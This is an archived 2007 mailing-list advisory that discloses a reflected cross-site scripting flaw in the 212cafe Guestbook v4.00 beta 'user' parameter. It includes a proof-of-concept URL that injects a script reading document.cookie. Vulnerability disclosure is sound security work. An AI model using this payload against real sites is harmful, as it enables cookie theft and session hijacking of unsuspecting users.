OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
XSS in Guestbook ( v.4.00 beta )

xx_hack_xx_2004hotmail.com
Date: Sat Jan 20 2007 - 19:16:01 CST


Hello

Vulnerable : Guestbook ( By 212cafe.com )
Version: v.4.00 beta
Web : http://www.212cafe.com

Exploit :
http://www.example.com/guestbookv4.0/show.php?user=[XSS]

Example :
http://www.example.com/guestbookv4.0/show.php?user='><script>alert(document.cookie);</script>

-----

Discoverey By Linux_Drox
www.LeZr.Com/vb

Best Regards ,,,,